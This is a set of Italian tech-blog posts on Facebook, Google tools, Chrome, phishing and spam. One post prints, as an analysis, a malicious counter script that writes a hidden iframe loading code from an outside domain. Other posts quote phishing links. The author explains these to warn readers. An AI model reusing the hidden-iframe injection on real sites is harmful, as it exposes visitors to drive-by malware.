Notiziole di .mau.

Ho appena visto le statistiche sul numero di utenti italiani di Facebook durante quest'anno (le trovate qua). È una cosa davvero impressionante. Da gennaio ad agosto il numero di utenti è solo triplicato, passando da 216.000 a 622.000: da lì in poi è semplicemente esploso, arrivando a novembre (gli ultimi dati che sono a disposizione) a 4.200.000. Credo siano un ordine di grandezza superiore agli utenti di Second Life che l'anno scorso sembrava essere ovunque e anche altrove. È vero che il numero di utenti non corrisponde necessariamente al numero di persone che usa la rete, ma per Facebook la tara da fare è probabilmente minore, considerando che dovresti entrare con il tuo nome-e-cognome e che sembra che ci sia una forte carica di viralità, come scrissi a suo tempo.
L'esplosione è ovviamente successiva di qualche mese alla localizzazione in italiano dell'interfaccia (nel maggio scorso), visto che le conoscenze linguistiche medie dei miei connazionali sono quelle che sono e che ci vuole un certo tempo perché le notizie si propaghino: però ritengo che il settembre 2008 sia il nostro Settembre Eterno. La mia sensazione è che Facebook non sarà una moda, ma reggerà parecchio a lungo (anche degli anni), finché non ci sarà un nuovo modello che lo rimpiazzerà nella voglia della gente di chiacchierare.
Per la cronaca, io sono su Facebook per colpa sua, dal 17 giugno. Del 2007.

Stamattina, tra i messaggi arrivatimi via Facebook, ce n'era uno che cominciava così - compresi gli a capo:
maurizio ma sei tu?
no!
ma perchè ce il tuo nome e la foto di un altro?
inspiegabile...
Il messaggio in questione era di una donna il cui nome non mi dice nulla (nemmeno la faccia, ma io non sono per nulla fisionomista). La tipa in questione probabilmente conosce un Maurizio Codogno che non sono io - in fin dei conti non siamo tantissimi ma, qualcuno ce n'è: come ho già scritto, ad esempio la persona presente in Wikipedia sotto Maurizio Codogno non sono io.
La cosa che mi ha colpito è che questa è la prima volta che in rete qualcuno cerca un mio omonimo e non il sottoscritto. E questo a sua volta significa che Facebook ha davvero sfondato la barriera tra la rete e il mondo reale, come dice anche Markingegno. Un conto è connettersi, navigare, scrivere email; un altro conto è pensare di essere di presentarsi in rete, come si potrebbe fare sull'elenco del telefono o sui citofoni. I miei dubbi su Facebook restano intatti: però non ho problemi a riconoscere il suo successo reale, non pompato da qualche giornale che deve farsi vedere alla moda.

Da un paio di giorni, se uno fa una ricerca con Google mentre è connesso con Google Account - detto in altro modo, se in alto a destra c'è scritta la sua email - si trova alcune iconcine vicino ai risultati: una freccia verso l'alto e una croce a fianco del nome della pagina, e un fumetto nell'ultima riga dei record. Queste icone servono per SearchWiki, l'ultima aggiunta alla ricerca Google. Leggendo il blog ufficiale, ci viene spiegato che in questo modo possiamo eliminare dalle nostre ricerche i risultati che non ci interessano, e alzare di grado quelli che riteniamo più importanti. Inoltre se andiamo in fondo alla pagina c'è anche la possibilità di aggiungere un nostro risultato alla ricerca. Come ho evidenziato, tutte queste modifiche sono private, nel senso che riguardano unicamente il nostro account personale: che poi sia proprio così non so dirlo, visto che in fin dei conti è sempre molto comodo avere dei dati in più per raffinare le ricerche. Ma magari a Google sono solo interessati a vedere cosa elimini per affinare i risultati della pubblicità che ti inviano... chi lo può sapere?
Oggettivamente, però, non riesco a capire l'utilità di queste iconcine, visto che i risultati cambieranno solo se rifaccio la stessa ricerca, e in questo caso non è che abbia tutto quell'interesse a vedere quali risultati avevo preferito: facevo più in fretta a salvarmeli tra i preferiti. Né può servirmi a vedere se la pagina su di me sta perdendo posizioni: anzi in quel caso devo stare assolutamente attento a non modificare i risultati, perché voglio sapere cosa vedono gli altri, non io!
L'unica cosa che forse potrebbe servire è l'aggiunta di un commento, visto che i commenti sono invece visibili da tutti. Ma anche qua mi rimangono dei dubbi. La cosa potrebbe essere più utile se uno potesse definire un insieme di "amici" (e magari uno di "guru") di cui si fida, e far sì che le ricerche siano raffinate usando i voti dati da tutti gli amici. Non so però quanto la cosa sia facilmente scalabile.

La notizia è di lunedì scorso, ma me ne sono accorto solo oggi. A quanto si legge sul blog ufficiale di Google, il servizio di traduzione automatica è stato aggiunto a Google Reader.
Di per sé non c'è nulla di nuovo, nel senso che sono solo stati messi insieme dei servizi già presenti: ma magari a qualcuno la cosa può servire. Attenzione: la traduzione è nella lingua che avete settato come "vostra" in Google Reader. Io ad esempio uso l'inglese come lingua di base, e quindi posso vedermi le traduzioni in inglese.

Beh, no, non è che mettete gli euro nella fessura del CD ed escono fuori i dollari: non siamo ancora arrivati a questo. Ma se avete bisogno di sapere quanto valgono oggi più o meno 1000 dollari, il sistema più semplice è usare Google e digitare come ricerca 1000 USD in EUR (le virgolette per una volta non servono).
Non credo che le pizze de fango del Camerun siano presenti nella base dati di Google, ma le valute più note vengono convertite. Per la cronaca, ecco le sigle di alcune valute:
EUR euro
USD dollaro USA
GBP sterlina inglese
JPY yen
RUB rublo
CAD dollaro canadese
AUD dollaro australiano
NZD dollaro neozelandese

Ho scoperto per caso l'esistenza di Microsoft TechNet Social, un sistema di gestione e condivisione dei propri bookmark made in Microsoft. Non essendomici iscritto non posso dire con sicurezza se ci sono dei vantaggi implementativi rispetto a del.icio.us, ma così ad occhio non mi pare. Bisogna dire che questa voglia di fare tutto non è solo della casa di Redmond: Google e Yahoo! fanno esattamente lo stesso, e non è sempre detto che il vincitore sia lo stesso per ciascun servizio. Ad esempio, del.icio.us è appunto di Yahoo!, e a mio parere è il vincitore. Però una clonazione pura come quella che mi pare essere Microsoft TechNet Social non mi sembra una grande idea... Qualcuno che lo usa mi sa dire di più?
(però è divertente vedere che tra i dieci link in prima pagina in quest'istante quattro puntino a Firefox :-) )

Stamattina volevo condividere una pagina con Google Share. Ho cliccato sul bookmarklet che mi sono appositamente salvato, e mi è arrivata una pagina in cui mi si diceva che dovevo rifare il login. Vabbè, penso io, il cookie sarà scaduto: poco male. Clicco, e finisco su questa pagina.
Io uso le interfacce inglesi di google, tra l'altro, e quindi potete immaginare come il vedere la pagina di accesso in tedesco mi ha fatto un po' senso. Ma se fate bene attenzione e guardate il redirect (ve l'ho lasciato apposta visibile almeno in parte) notate che è verso Google Spagna (che poi non funzioni è tutta un'altra storia). Qualcuno sa che cosa c'è sotto?
Ah, alla fine l'articolo l'ho condiviso su tumblr ;-)

Per chi è in rete da troppo tempo come me, gli RFC (i "documenti ufficiali" di Internet) che definiscono la posta elettronica erano l'821 per il protocollo SMTP e l'822 per definire il formato di un messaggio email, datati 1982.
Per chi è in rete da qualche tempo, gli RFC al riguardo sono diventati il 2821 e 2822 (del 2001): non è un caso, naturalmente, che siano stati scelti quei numeri di RFC: almeno uno se li poteva ricordare.
Oggi MdI fa sapere che bisogna di nuovo cambiar numero. Questa volta eravamo troppo lontani dall'x822, così si è sommato 2500 all'indice e si è arrivati al 5321 e 5322. In quest'ultimo, immeritatamente visto che negli ultimi anni non ho più seguito la cosa, sono ancora citato negli Acknowledgments :-)

Qualcuno alla Stampa si è accorto che forse (forse) mettere a disposizione i feed RSS è piuttosto inutile, se non vi si inseriscono anche i testi oltre ai titoli. E così da stamattina mi sono accorto che Jena e Buongiorno si possono leggere da Google Reader senza doverci cliccare sopra e andare sul sito; lo stesso vale per gli editoriali. Se per Gramellini e Barenghi il problema non è che si ponesse, visto che uno andava a leggere sulla fiducia, gli editoriali erano un terno al lotto: non è che da un titolo si riesca sempre a capire di che cosa parli l'articolo. Adesso bel feed manca ancora il nome del giornalista, ma se uno è abituato a leggere la Busiarda bastano poche righe per capire chi possa avere scritto questo :-)

Ho acceso il mio PC, e subito mi ha intimato di verificare gli aggiornamenti di sistema "proprio per me". Io sono un bravo bambino, ho verificato, e ho scoperto che c'è 1.3MB per il nuovo "Windows Genuine Advantage Notification".
Ora, io capisco che «The Windows Genuine Advantage Notification tool notifies you if your copy of Windows is not genuine. If your system is found to be non-genuine, the tool will help you obtain a licensed copy of Windows» (il mio sistema operativo è in inglese). In Microsoft hanno usato una formulazione assolutamente a prova di avvocato. Capisco anche che Microsoft apprezzerebbe che io usassi una copia non taroccata. (Ah: per spiegargli che la mia copia in effetti non è taroccata, due anni fa ho avuto qualche problema...).
Quello che non capisco è perché ogni mese o giù di lì devo scaricarmi di nuovo il programma. Capirei se io avessi aggiunto altro software Microsoft: allora magari la vecchia versione dovrebbe accorgersi di non riuscire a validare le aggiunte, e quindi chiedermi di essere aggiornata. Ma altrimenti rimangono due casi: o il software originale Microsoft dopo un certo tempo diventa automaticamente inaffidabile, o che il programma non è capace a verificare così bene, e stanno ancora mettendolo a punto. In effetti, entrambe le possibilità hanno un qualche senso.

Un terabyte è tanto, tanto spazio. Per dare un idea, sono più di duecento DVD. Eppure Oosah osa :-) regalarvelo.
L'ho provato. Innanzitutto c'è un'interfaccia flash9 che può infastidire qualcuno, e soprattutto si possono solo postare file multimediali di tipi ben specifici: ad esempio, per l'audio è solo accettato l'mp3, e un formato di testo come pdf non è permesso. Se uno si fida, può garantire al sito accesso a YouTube, Flickr e Picasa per poter vedere tutti i propri set; altrimenti può caricare e gestire le foto con un'interfaccia tipo file manager e una grafica relativamente innovativa (mentre il tutto si carica il testo appare sfuocato). Si possono raggruppare le foto in gallerie, e dare eventualmente accesso libero o protetto da password.
Tutto sommato, Oosah può essere un buon metodo per avere un backup delle proprie foto, anche se non mi fiderei certo a usarlo come unico sistema di archiviazione, visto che il sito potrebbe sparire da un momento all'altro.
(via DElyMyth)

(prometto che per un po' è l'ultimo post su Google Chrome, che ho anche da lavorare io!)
Non ho ben capito perché, ma l'interfaccia di Chrome è in italiano e non in inglese, nonostante avessi cambiato lingua prima di scaricare il programma di setup. (ok, da Opzioni → Piccoli ritocchi → Caratteri e lingue si può cambiare la lingua dell'interfaccia; peccato non si possa anche disabilitare il correttore ortografico, che è una palla assurda).
Ma la cosa migliore è la traduzione del termine per le opzioni avanzate ("Under the Hood" in inglese), che è diventato "Roba per smanettoni". Sono tornato indietro nel tempo di una quindicina d'anni almeno!
P.S.: c'è una pagina che - almeno qui dall'ufficio, con proxy e quant'altro - Chrome non riesce proprio a mostrarmi: quella di gmail ;-) Non riesco a settare la gestione dell'https.

Credo che quasi tutti i miei lettori sappiano che oggi sta per uscire (solo per windows) Google Chrome, il browser della simpatica società che ha come motto "Don't do evil". Se volete dei giudizi teNNici, avete completamente sbagliato blog, ma sono certo sarete in breve sommersi, e scommetto che persino Repubblica e Corriere avranno il loro bell'articoletto; se volete una stroncatura aprioristica della scelta googliana, leggete PTWG.
Nel mio piccolo mi limito a fare delle considerazioni a partire dal fumetto disegnato per spiegare le "nuove" caratteristiche del browser. L'idea che mi sono fatto è che il mercato che Chrome intende erodere è quello di Internet Explorer, e per fare ciò ha mostrato come "grandi novità" cose tipo l'autocompletamento degli indirizzi e la home page con i nove siti più visitati (come in Opera). E naturalmente fa in modo che il browser si integri così bene con le ricerche made in Google da portare acqua al proprio mulino. La cosa che più mi ha stupito nella presentazione è però il mischione di terminologia molto tecnica - ci sono spiegazioni che se non hai studiato informatica all'università sono assolutamente arabo - e marchette pubblicitarie a basissimo livello: sembra quasi che la parte tecnica sia da assumere più o meno come magia.
Il modello dove ogni tab ha la sua macchina virtuale, e quindi il suo spazio di memoria, è sicuramente più stabile di quello classico, non ci sono dubbi. Però occupa parecchia memoria, molto più di quanto loro mostrano con il disegnino del grafico. Anche il modello a sandbox per la sicurezza darà un vantaggio solo iniziale: proprio perché comunque esistono i plugin, le falle passeranno di là, e sarà una ben magra consolazione poter dire "ma il browser è sicuro". L'altro punto che non mi torna è il supporto agli standard (ufficiali e di fatto). Che non se ne parli affatto non è per nulla bello, e l'idea di usare un nuovo interprete JavaScript aumenta la possibilità che una pagina sia vista correttamente su un browser e male su un altro. È vero che l'HTML di oggi è ben diverso da quello del 1998, ma lo è non tanto per il linguaggio ma per tutto quello che gli sta attorno, dagli script ai fogli di stile. La parte di "gears" che dovrebbe essere di aiuto agli sviluppatori è stata giusto accennata nel fumetto, il che è piuttosto preoccupante proprio perché non basta dire che Chrome è open source ma occorre anche dare la possibilità pratica di interagirci.
Vedremo insomma che succede, ma non credo che Chrome supererà una percentuale di nicchia.

p.s.: come volevasi dimostrare, ecco Cor & Rep!

Tra i tanti siti 2.0 o quel che l'è che sono spuntati in questi mesi, mi pare di non aver sentito parlare molto di Tablefy. Probabilmente frequento le compagnie sbagliate.
Ad ogni buon conto, Tablefy ti permette di costruire delle tabelle di comparazione online tra quello che ti pare. Fin qua nulla di così trascendentale, sono il primo ad ammetterlo. Però c'è il vantaggio di potere costruire la tabella, se si vuole, in maniera aperta ai contributi di tutti; e si possono prendere pezzi di tabelle in giro per il sito per costruirsi la propria. Ho fatto un veloce esperimento qui, tanto per avere un'idea, e la creazione di una tabella è stata abbastanza semplice, anche per includere immagini all'interno delle tabelle. Ci sono un po' di problemi con il mio proxy (le pagine si direbbero cachate, e quindi mi ritrovavo connesso anche dopo avere fatto logout) e secondo me manca la possibilità di fare tabelle accessibili a un gruppo specifico di persone, ma il sito può risultare già utile a chi volesse abbellire il proprio blog con qualche confronto "colorato"!

Scopro da kchico che tra le varie traduzioni automatiche fornite da google c'è anche quella dall'italiano al croato. Non parlando croato non posso dirvi se e quanto il tutto è comprensibile: in un momento di autoreferenzialità vi invito a dare un'occhiata a questa stessa notiziola per vedere l'effetto che fa.
Gli smanettoni - e qui ti voglio vedere il traduttore automatico! - possono cambiare il parametro "hl" ("home language"?) per vedere la stessa notiziola in inglese, francese, tedesco e chissà cos'altro.

Il mio amico Ugo mi conosce, e sa che farei di tutto pur di non lavorare... ehm, per rispondere alle domande di un test. Mi ha inviato così queste venti domande sulla programmazione, dove ho avuto la conferma di quello che sapevo: ne so ben poco (13 risposte corrette su 20). Devo dire però che il test è fatto piuttosto bene: mi sono scompisciato alla domanda 7, dove una delle risposte a "qual è il migliore modo per assicurarsi di scrivere codice assembler type-safe?", anzi all'equivalente in inglese, è "pregando devotamente" :-) (a quella domanda ho risposto correttamente, intendiamoci)

Bisogna dire che la pubblicità (diretta e indiretta) su Cuil, il motore di ricerca "dei transfughi di Google", che mi sono trovato oggi è incredibile.
Però mi chiedo come mai, se scrivo "Maurizio Codogno" tra virgolette, il signor Cuil cerca di spiegarmi che potrei affinare la ricerca specificando "Villages In Wisconsin". Capisco al limite "Cities And Towns In Lombardy", anche se le virgolette intorno al mio nome-e-cognome avrebbero dovuto dare all'algoritmo qualche ideuccia al riguardo, ma il fatto che Randolph, Albany e Spencer siano nomi di cittadine di uno stato USA non mi pare così importante...
Mettiamola così: la Grande G può starsene ancora tranquilla per un po'. "Cuil" si dovrà anche pronunciare come "cool", ma le somiglianze finiscono qui.

Se avete bisogno di uno spazio condiviso fondamentalmente anonimo - io non mi fido mai dell'anonimato in rete - potreste buttare l'occhio su drop.io. Tu puoi crearti un "drop", vale a dire una directory "discreta" (il gioco di parole viene persino meglio in italiano: in inglese devono spiegare che è "discrete - tes, 'ete'") dove mettere fino a 100 MB di contenuti. Il nome della directory può essere casuale oppure se ne può scegliere uno di almeno sette lettere; e si può anche definire per quanto tempo questa directory debba esistere, anche se poi il tempo può essere prolungato a piacere. Il tutto può essere protetto - ma anche no, è a scelta del creatore - da una doppia password: per accesso e amministrazione del drop.
I file vengono poi presentati in modi diversi: è possibile scegliere la vista "blog" (dal più recente in giù), oppure "media", quella standard, o ancora una ottimizzata per telefonini. Tra i gadget presenti nella versione attuale, che sta per essere ulteriormente migliorata, c'è ad esempio la possibilità per l'amministratore non solo di cancellare di colpo tutto ma anche di rinominare il drop, cosa che a volte fa sicuramente comodo; si può poi dare accesso al proprio drop solo in lettura o anche in aggiunta e in modifica contenuti. Il tutto infine con la certezza che i file non vengano indicizzati dai motori di ricerca. Ah: almeno negli USA puoi telefonare al tuo drop e lasciare un messaggio vocale che viene convertito in MP3. Non ho verificato se funzioni anche via Skype.
Un Vero Paranoico diffiderà sicuramente del servizio, ma secondo me ha la sua utilità!

Prima il proxy dell'ufficio si era preso una pausa postprandiale, e quindi non riuscivo ad accedere a gmail. Ho tirato così fuori il telefonino per vedere cosa c'era di nuovo. Immediatamente dopo, come Murphy insegna, il proxy si è risvegliato: ho aperto la pagina e sotto la lista dei messaggi mi è apparso, bello evidenziato in giallo, l'avviso mostrato nel titolo di questa notiziola. Viene anche indicato l'IP dell'altra connessione, per la serie "se vuoi puoi andare a caccia del malfattore".
Da un lato un avviso del genere è sicuramente utile, perché ti avvisa di quello che magari è un uso improprio del proprio account (leggi, qualcuno ti ha fregato la password); dall'altro, il pensiero che abbiano deciso di implementarlo mi fa pensare che craccare gli account gmail sia diventato uno sport abbastanza diffuso ;-( (E comunque, detto tra noi, se io proprio dovessi leggere il gmail altrui lo farei via IMAP, meno tracce lasciate)
Aggiornamento: (18:00) Come fa notare nei commenti Paolo, in generale ora è possibile sapere quali sono le ultime connessioni fatte a Gmail, di che tipo sono (web, POP, mobile...) e da che IP arrivano. Maggiori informazioni sulle pagine help di gmail.

Stamattina volevo capire perché un sito coreano avesse un puntatore alla mia categoria "matematica light" (poi non l'ho mica capito), quindi avevo bisogno di un traduttore automatico. Memore dei bei tempi andati, ho digitato http://babelfish.altavista.com/, e mi sono trovato un logo di Yahoo!. In effetti, la pagina mi aveva ridiretto su babelfish.yahoo.com; la cosa doveva essere piuttosto recente, visto che nella pagina c'era anche un avviso che mi assicurava che non ero stato io a sbagliare indirizzo.
Lasciatemi versare una lacrimuccia pensando a tutto il tempo trascorso. Quando il web era davvero giovane, Google non esisteva nemmeno nella fantasia di Page e Brin, e nessuno parlava ancora del Y2K bug, c'è stato un momento in cui il motore di ricerca più usato era Altavista. Per la precisione, http://altavista.digital.com, perché altavista.com era il sito non ricordo se di un'azienda di Real Estate o cos'altro, che poi ha deciso di cedere il nome a dominio probabilmente perché si era scocciata di ricevere pacchi di richieste di ricerche web. Babelfish nacque appunto come progetto della Digital, in collaborazione con Systran, e strizzando l'occhio a tutti noi che sapevamo esattamente il perché di quel nome.
Beh, ho appena verificato: il sito di altavista esiste ancora, ma è chiaro che ormai è più che altro un leftover, un dinosauro che è rimasto solo come sottomarchio (basta vedere che i risultati delle ricerche puntano tutti a http://av.rds.yahoo.com/ ...). La lacrimuccia non è chiaramente per la morte di altavista, ma al pensiero di tutti gli anni che sono passati :-|

Toh, un nuovo servizio 2.0 (immagino che sia 2.0, almeno dalle icone). L'idea dietro Posterous è che tu per l'appunto posti del materiale (lo mandi a post@posterous.com) e loro ti creano una pagina stile blog. Fin qua nulla di entusiasmante. Anche il concetto "ah, ma se tu mandi un file mp3 o un video su YouTube noi lo mostriamo in maniera intelligente" è poi chissà cosa: basta vedere tumblr, tanto per fare un esempio a caso.
Quello che alla fine potrebbe essere l'uso killer (in tutti i sensi) è la loro scelta di non richiedere necessariamente di loggarsi per creare la propria pagina. Se uno invia un messaggio, posterous risponde (per sincerarsi che l'indirizzo esista, chiedendo l'ok per la pubblicazione) e crea una pagina con un nome formato da quello del mittente e da una stringa casuale (con l'unica fregatura che l'unione è effettuata aggiungendo un carattere "_" che il mio firewall giustamente rifiuta, e quindi dall'ufficio non posso raggiungere il sito).
Supponiamo ora che io mi crei una casella email temporanea, magari di quelle a durata limitata a un giorno. Da questa casella posso inviare i brani dell'ultimo disco di miticoVasco o miticoLiga[*]; a questo punto i brani sono a disposizione di tutti, basta passare l'indirizzo web della pagina, e siamo tutti felici e contenti (tranne la SIAE, mi sa tanto).
Essendo io una persona sprezzante del pericolo e della SIAE, ho fatto una prova con un mio proprio sito: giudicate voi stessi il risultato!

[*]no, non farei mai una cosa del genere. Io voglio bene all'Internette, perché rovinarla così? Ah: miticoVasco e miticoLiga, anche se con le maiuscole messe diverse, sono scopiazzati ispirati da lui.

Leggo da DElyMyth che Gmail ha un tetto giornaliero al numero di messaggi che si possono inviare. Non è possibile inviare più di 500 messaggi al giorno, un singolo messaggio non può essere inviato a più di 500 destinatari, e il numero totale di destinatari (ogni messaggio inviato a N persone conta come N) non può superare i 2000. Addirittura, se si usa l'interfaccia POP o IMAP, il limite scende a 100 messaggi al giorno.
Personalmente la cosa non mi preoccupa più di tanto: soprattutto per quanto riguarda la parte POP/IMAP, si può tranquillamente immaginare che una persona che abbia bisogno di fare invii massicci di messaggi abbia un altro mailserver su cui autenticarsi. E d'altra parte, almeno leggendo qui, i limiti di Google sono maggiori di quelli di altri sistemi di email gratuita. Quello che però mi dà fastidio è che non è affatto facile trovare scritti da qualche parte questi limiti. Solo sapendo cosa cercare mi è uscito fuori questo risultato. Si direbbe insomma che l'usabilità non è ancora una priorità per gli amici di Google!

stamattina l'ho scaricato, e poi l'ho installato - su una directory diversa e usando un profilo pulito, per evitare troppi casini.
Però a quanto pare non riesco a reimportare le password né i bookmark (tutta roba che ho in locale), e nemmeno collegarmi a Foxmarks. Al momento ho altro da fare: mi sa che FF2 rimarrà ancora per un po' il mio browser preferito :-)
Aggiornamento: (16:40) Con un upgrade del vecchio profilo le cose sembrano (paradossalmente) funzionare meglio.

Come ho già scritto, il mio pc aziendale è gestito remotamente. Nulla di male in generale. Però tra le policy di dominio, su cui io non posso fare nulla pur avendo i diritti di amministratore, c'è anche quella sullo sfondo del PC. Fino alla scorsa settimana, avevo perlomento la possibilità di non avere uno sfondo, ma semplicemente un colore uniforme, e mi accontentavo. Ma lunedì, in un tentativo da remoto per permettermi di accedere alla posta aziendale all'avvio del pc - non che ci siano riusciti, ma visto che poi ho scoperto che la colpa è di ZoneAlarm che blocca non riesco a capire quale processo, e visto che io ufficialmente non dovrei avere un firewall aggiuntivo, me lo tengo così - sono stato forzato ad avere lo Sfondo Telecom Ufficiale, con una bella barra rossa in cima comprendente il logo e un disegno in mezzo che non mi fa più distinguere le icone.
A questo punto mi sono scocciato. Sono andato su C:/WINDOWS e come prima cosa ho sostituito il file NewSfondo.jpg con l'immagine che volevo io (la foto della blogosfera che era uscita a suo tempo su Nòva : tranne che al centro è praticamente tutta nera, l'ideale). Togliere la barra è stato un po' più complicato: alla fine ho scoperto che il colpevole era il file desk.htm, sempre nella directory di Windows, che è stato pertanto opportunamente modificato.
A parte queste operazioni illegali che ho compiuto, capisco che forse lo sfondo uniforme è stato pensato per le segretarie, e che le segretarie probabilmente non si darebbero la pena di fare tutte queste modifiche (a parte che mi sa che non abbiano nemmeno i diritti di accesso a quei file). Però qual è la vera ragione logica di avere una policy per gli sfondi? Fanno forse male a qualcuno?
Aggiornamento: (12:30) tra le altre "novità" dopo l'intervento remoto c'è stata la modifica della home page di Internet Explorer (che avevo settato ad http://localhost/) Cosa c'è adesso? Il sito Telecom? l'intranet? No. http://it.msn.com/. Giusto per dire come sono fatte le policy aziendali.

Stasera, mentre aspettavo che il diluvio su Milano scemasse un po' per tornare a casa, mi sono accorto che se cliccavo su un'icona nella barra Quick Launch (come si dice in italiano? Esecuzione rapida?) del pc dell'ufficio non succedeva nulla. Se però aprivo la cartella Quick Launch, da lì i programmi partivano. Vabbè, ho pensato, poco male, tanto poi lo spengo e domani mattina si vedrà.
Torno a casa, e Anna era sul mio PC. Dopo un po' mi chiama dicendo "non riesco a far partire Firefox dall'iconcina!" Stava succedendo esattamente la stessa cosa. (Per la cronaca, adesso ho ammazzato e fatto ripartire explorer.exe e il tutto sembra a posto).
Cos'è? il 22 maggio è la Giornata In Cui XP Ha Più Paturnie Del Solito?

Paolo Beneforti potrà finalmente vedere che non ce l'ho solo con Repubblica.it. Il Corsera ha appena pubblicato questo articolo, scopiazzat^W tratto da Wired (a onor del vero, il link ce l'hanno messo), dove si parla della prima calcolatrice meccanica in grado di fare moltiplicazioni, e si termina con la frase «Nel 1972, grazie al contributo di queste (e altre) grandi intuizioni, nascerà poi la Datamah, la prima calcolatrice tascabile prodotta da Texas Instruments.».
Ok, la serie di calcolatrici sarebbe la Datamath, ma bisogna dire che la traduttrice ha fatto una ricerchina, visto che il nome non c'era nell'articolo ufficiale. L'errore di battitura non lo computo certo. Il fatto è che se Wired ha deciso di fare una marchetta a TI, non è bello copiarla: la prima calcolatrice elettronica tascabile è stata la HP35 (vedi anche qua). Mi sa tanto che la signora Di Pasqua ai tempi non era ancora nata :-)

Inizio con una notizia di servizio, anche se probabilmente inutile visto che i miei lettori sono italianofili. Se vi arriva un mail scritto in portoghese/brasiliano dal titolo Telegrama Urgente!, non cliccate sopra il Telegrama, anche perché il file index.php invia immediatamente uno .scr che è il troiano Mal.Banker.
Aggiungo poi che l'ultimo phishing sulle Poste Italiane non è nulla di particolare, se non per l'indirizzo di invio che è posTTe.it, probabilmente la versione finnica; altrimenti le Poste ItaliEne sono sempre una sicurezza.
Ma la parte più divertente è sicuramente lo spam dei riciclatori russi di denaro dalla provenienza non ben determinata. ll messaggio, che mi è arrivato sulla casella di posta aziendale subito prima delle scuse di Luca Luciani (non credo però ci sia una correlazione) era scritto centrato come una poesia sperimentale anni '60 e il traduttore automatico aveva fatto del suo meglio per generare del lirismo degno di ben altri scritti. Vi lascio alcune chicche per farvi iniziare meglio la giornata:
- Noi siamo la società sviluppata con il ricco di movimento nel campo di finanzaria!
- Per rafforzare la nostra società noi stiamo cercando dei professioniste [però il femminile genera qualche equivoco...]
- Le suggeriamo del stipendio quello dipende da volume del vostro lavoro
Ma il meglio è alla fine, quando mi viene detto a quale indirizzo scrivere per "chiedere le dettagli oppure fare le domande": la frase inizia con "Se Lei è interessante". Sono già tagliato fuori in partenza.

Domenica avevo scritto a proposito dei troiani che cercavano di intrufolarsi sul mio povero PC mentre navigavo sulle pagine di splinder. Oggi pomeriggio, mentre guardavo che succedeva da Copiascolla, mi sono visto in diretta il troiano che voleva cambiare la mia homepage (come se io non usassi SpyBot e TeaTimer per bloccare simili richieste :-) ) Mi sono messo a dare un'occhiata a quale parte del codice inserisse il tutto: dopo avere benedetto il fatto che Firefox ti permette di scrivere view-source: e visualizzare il sorgente di una pagina web invece che la pagina stessa, ho scoperto che il colpevole era il contatore delle statistiche. Se uno guarda http://stat.superstat.info/counter.php, o almeno lo guardava quando ho provato io, avrebbe trovato questo simpatico pezzo di codice:

if ( parseInt(pr17) <= parseInt("9") && parseInt(visit17) < 2 ) {
document.write('<div style="position:absolute;left:-5000px;top:-5000px;visibility:hidden;">');
document.write('<if'+'rame frameborder="0" src="http://a1p.cgste2.won-ppp.info/htm/cc1.php?p=55&cc2=it"><'+'/iframe>' );
document.write('</div>');
};

Ho già detto che io JavaScript non lo parlo, ma credo che sia abbastanza chiaro che viene aperto un iframe che chiama appunto uno script su won-ppp.info. Ho provato a guardare le informazioni di whois per superstat.info, e ho visto che il dominio è "nascosto", o meglio registrato da domainsbyproxy.com, che afferma di essere un utile servizio perché i dati pubblici dei dominii non siano preda di spammer ma a me sembra più un sistema perché non si sappiano i dati degli spammer. L'ultimo aggiornamento del record è dello scorso ottobre: visto che Gaia mi ha detto che quel contatore ce l'ha da almeno un anno, non penso sia impossibile che il dominio sia scaduto e sia stato preso da qualcuno che usi il servizio come copertura - sì, lo so, fa tanto James Bond o il negozio di fiori dei vecchi Alan Ford, ma che ci volete fare?
Vabbè, se non avete capito nulla del pippone non è importante, visto che quello che conta :-) è solo quest'ultima riga. Se avete un contatore su superstat.info, toglietelo subito.

In un post su neverendingbooks che parlava di tutt'altro, ho scoperto l'esistenza di questo sistema di crittografia, che è stato indubbiamente generato da una mente malata. L'idea di base del sistema è che per crittare un testo (in maniera standard, intendo) occorre ovviamente il testo da crittare, ma anche una chiave. Nel sistema di Rod McFarland, la chiave è il contenuto di un URL (nascosta all'interno del testo crittato). Questo significa che basta che il contenuto della pagina cambi, e non è più possibile tornare al contenuto iniziale[*]. La cosa diventa divertente, come nel caso di neverendingbooks, quando la pagina utilizzata per crittare è una come isitfriday; in pratica si può leggere il post solamente di venerdì. Qualche info in più la trovate qua.

[*] in realtà credo che siano possibili degli attacchi basati sul fatto che il testo usato per crittare non è statisticamente casuale, ma non stiamo a sottilizzare.

L'idea del messaggio minimale praticamente solo con un link non era in realtà male, anche se forse rovinata dal testo che diceva:
 
     Banca di Roma - Cliente Messaggio.
     VAI AL MIO MESSAGGIO Clicca qui
 
(il "qui", per i curiosi, era http://campusvirtual.caschile.cl/claroline/auth/extauth/drivers/main.html il quale a sua volta rimandava a un indirizzo che inizia con http://www.cologne-fight-crew.de/vwar/upload/a.php? e continua con la stringa %1%2%3%24%42%32%62%13%76%81%37 ripetuta sei volte di fila. Ci deve essere sicuramente un significato esoterico che mi sfugge)
Il tutto però è rovinato dal titolo del messaggio: Phishing: Banca di Roma - Cliente Messaggio.
La cosa più strana è che firefox non sapeva ancora che il sito tedesco era farlocco. O sto diventando molto più veloce a fare le prove, oppure la gente si è scocciata di segnalarli, il che potrebbe anche non essere male in un tentativo di evoluzione genetica dell'intelligenza del genere umano.

Nella simpatica azienda in cui lavoro, come penso in quasi tutte le aziende con più di due addetti, vige l'abitudine di dovere preparare un foglio in cui si indica su cosa si è lavorato: in questo modo qualche consulente può preparare delle bellissime statistiche, che qualche capetto può orgogliosamente mostrare ai caponi. Naturalmente non è possibile mantenere sempre e solo lo stesso sistema per fare la rendicantazione, perché dopo un po' anche i caponi si accorgono che c'è qualcosa di strano, e i consulenti non hanno più lavoro. Così anche quest'anno il sistema è cambiato, e finalmente ieri mi è stata data la possibilità di spiegare cosa ho fatto da Capodanno in poi. Ecco qua così una recensione che vi racconta quello che devo fare...
